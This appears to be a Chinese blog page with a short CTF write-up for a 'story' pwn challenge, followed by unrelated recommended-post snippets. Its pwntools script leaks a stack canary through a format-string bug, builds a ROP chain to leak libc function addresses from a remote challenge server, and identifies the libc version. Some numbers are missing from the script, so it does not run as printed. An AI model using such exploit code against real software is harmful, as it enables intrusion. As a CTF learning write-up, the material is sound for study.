无限story服务器质量,story 泄露服务器libc版本

最新推荐文章于 2024-03-10 10:01:05 发布
最新推荐文章于 2024-03-10 10:01:05 发布
阅读量117 收藏
点赞数
文章标签: 无限story服务器质量

记录下学到的姿势,利用信息泄露得到服务器libc 至少两个函数偏移,利用libc-databse得到服务器libc版本

泄露脚本如下

from pwn import *

context.log_level='DEBUG'

r=remote('ctf2.linkedbyx.com',)

#r=process('./story')

elf=ELF('./story')

'''

rop_chain=

payload='a'*0x90+canary+'b'*+rop_chain

r.sendlineafter('Tell me the size of your story:',payload)

'''

'''

0x0000000000400bd3 : pop rdi ; ret

'''

main=0x0000000000400876

r.sendlineafter('Please Tell Your ID:','%15$p')

r.recvuntil('Hello ')

canary=int(r.recv(),)

success('canary:'+hex(canary))

payload='a'*0x88+p64(canary)+'b'*+p64(0x0000000000400bd3)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(main)

r.sendlineafter(':','')

r.sendlineafter(':',payload)

read=r.recv()

print read

#success('read:'+hex(read))

#r.interactive()

r.sendlineafter('Please Tell Your ID:','%15$p')

r.recvuntil('Hello ')

canary=int(r.recv(),)

success('canary:'+hex(canary))

payload='a'*0x88+p64(canary)+'b'*+p64(0x0000000000400bd3)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)

r.sendlineafter(':','')

r.sendlineafter(':',payload)

puts=r.recv()

print puts

r.interactive()

之后./find read 250 puts 690即可泄露服务器libc

root@snip3r:~/libc-database# ./find read puts

ubuntu-xenial-amd64-libc6 (id libc6_2.-0ubuntu10_amd64)

archive-glibc (id libc6_2.-0ubuntu11_amd64)

有了libc直接构造ROP即可

java24 手写服务器最终版本

手写服务器最终版本; <?xml version="1.0" encoding="UTF-8"?>

常见Linux服务器操作系统版本中自带的OpenSSL版本

下表是常见服务器操作系统版本中自带的OpenSSL版本: 从上表可以看出,目前常用的服务器版本中,默认OpenSSL为1.0.2的只有Ubuntu 16.04 LTS.其他版本如果要升级OpenSSL ...

Git回退到服务器某个版本正确姿势

背景: Git协作中,成员不可避免地会提交一些错误的版本,由于Git相比SVN引入了本地仓库,操作会相对复杂,以下为姿势分解 找一个源文件RspUtils.java,加上一行注释 //测试回退git服 ...

获取DNS服务器的版本信息

1 如何获取DNS服务器的版本信息 向某个DNS服务器发送下面的请求即可获得版本信息 dig @115.124.17.156 version.bind chaos txt 它返回的信息如下: ; &l ...

通过SSH服务登陆linux服务器(版本RHEL7)

通过SSH服务登陆linux服务器(版本RHEL7) SSH服务概述:是一种能够以安全的方式提供远程登陆的协议,也是目前远程管理linux系统的首选方式.在此之前,我们一般使用FTP或者telnet来 ...

git回退版本: 回退本地代码版本 &plus; 回退服务器代码版本

1.回退本地代码版本 借助IDEA开发工具回退版本,点击Version Control ,查看历史版本号: 右击想要回退的版本号,选择Reset Current Branch hear... 选择 H ...

EasyDarwin开源流媒体服务器Golang版本:服务端录像功能发布

EasyDarwin开源流媒体服务器(www.easydarwin.org)现在使用Go版本实现了.最新的代码提交,已经支持了推流(或者拉流)的同时进行本地存储. 本地存储的原理,是在推流的同时启动f ...

linux SVN服务器创建版本库

1.安装svn服务 # yuminstall subversion 2.新建一个目录用于存储SVN所有文件    # mkdir /home/svn 3.在上面创建的文件夹中为项目 project_1 ...

git 新建服务器的版本以及项目的用户

一, git客户端账号生成 1. git的客户端的公钥生成 ssh-keygen -t rsa -C "test@gmail.com" mac机器会在 /Users/用户/.ssh ...

随机推荐

HTML 播放器 写给自己

付子花
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最新版本linux libc库实现源码
12-06
最新版本linux libc库实现源码.里面有各种函数的实现源码,很适合学习
story 泄露服务器libc版本
weixin_30498921的博客
04-09 99
记录下学到的姿势,利用信息泄露得到服务器libc 至少两个函数偏移,利用libc-databse得到服务器libc版本 传送门 泄露脚本如下 from pwn import * context.log_level='DEBUG' r=remote('ctf2.linkedbyx.com',10755) #r=process('./story') elf=ELF('./st...
pwn入门-buu刷题第一页笔记(32道)(更新完毕,下一章见)
2303_79366759的博客
03-10 1043
可以发现我们输入I之后被替换成了you,那么根据这个特性,本来只能输入32个字符的fget函数,我们只要输入适当的I,再构造合适的payload,那么在执行这个strcpy(s, v0)函数时就可以发生栈溢出。这个函数的目的是打开名为 "flag.txt" 的文件,从该文件中读取最多 45 个字符,并将结果存储在 fl4g 数组中。寒假做过的,现在可能有点忘了,写一下题解的同时巩固一下自己,同时供各位正在入门pwn的师傅参考一下,写的不好的地方希望有师傅多多指教,第一次写博客,写的不好的地方还请见谅.
【PWN · ret2libc】[BJDCTF 2020]babyrop
Mr_Fmnwon的博客
07-24 166
简单而纯粹的ret2libc,更推荐上面那篇博客哦~相当于在这题基础上又加了一些保护,算是plus版前些日子为了准备期末考,长时间没有进行CTF-PWN的学习。而ret2libc一直都是不太熟练地点。多刷多总结。加油!
2021-10-11 Pwn练习记录
m0_56897090的博客
10-11 363
文章目录easy题目分析EXP重做note2分析EXP重做[ZJCTF_2019]Easyheap分析EXP重做actf_2019_babystack分析EXP重做gyctf_2020_borrowstack分析EXP重做ciscn_2019_en_3分析EXP重做bjdctf_2020_YDSneedGrirlfrien分析EXP重做gyctf_2020_some_thing_interesting分析EXP重做ACTF_2019_babyheap分析EXP重做Wustctf2020_easyfast分析
libc-2.24源代码
02-06
libc-2.24源代码
libc.so.6 libc.so.6
05-31
libc.so.6
libc_libc_zip_源码
10-04
glibc GNU c.Description
musl libc 源码实现
02-22
musl libc 是一个轻量级的 C 标准库实现,与其他 C 标准库有着一些显著的区别和特点。 它非常适合用于嵌入式系统的开发。嵌入式系统通常对资源消耗有较高要求,而 musl libc 的小体积和高效性使得它成为开发嵌入式...
智慧学院智能化项目规划设计方案PPT(45页).pptx
05-03
智慧学院智能化项目规划设计方案PPT(45页).pptx
AO工艺设计计算(全).xls
05-03
污水处理计算书
ASP+ACCESS动态网站设计与制作(源代码+设计说明书).zip
05-03
ASP+ACCESS动态网站设计与制作(源代码+设计说明书).zip
基于matlab实现的二维渗流代码,用于模拟在二维条件下,格点所受碰撞的次数.rar
05-03
基于matlab实现的二维渗流代码,用于模拟在二维条件下,格点所受碰撞的次数.rar
基于matlab实现可实现脉冲编码调制,模拟信号的数字传输:抽样、量化、编码.rar
05-03
基于matlab实现可实现脉冲编码调制,模拟信号的数字传输:抽样、量化、编码.rar
ASP+access网上购物系统(设计说明书+源代码).zip
05-03
ASP+access网上购物系统(设计说明书+源代码).zip
Screenshot_20240503_054519.jpg
05-03
Screenshot_20240503_054519.jpg
node-v12.17.0-linux-armv7l.tar.xz
最新发布
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
ASP+ACCESS软件信息发布系统设计(源代码+设计说明书+调研报告+任务书).zip
05-03
ASP+ACCESS软件信息发布系统设计(源代码+设计说明书+调研报告+任务书).zip
gcc libc abi版本
06-01
而这个标准包括了对于C标准库的版本要求,即要使用与目标系统兼容的libc版本。 在GCC编译C程序时,可以使用"-std=xxx"选项指定C语言标准,同时也会自动链接与该标准库版本兼容的libc库。例如: - "-std=c11"会使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值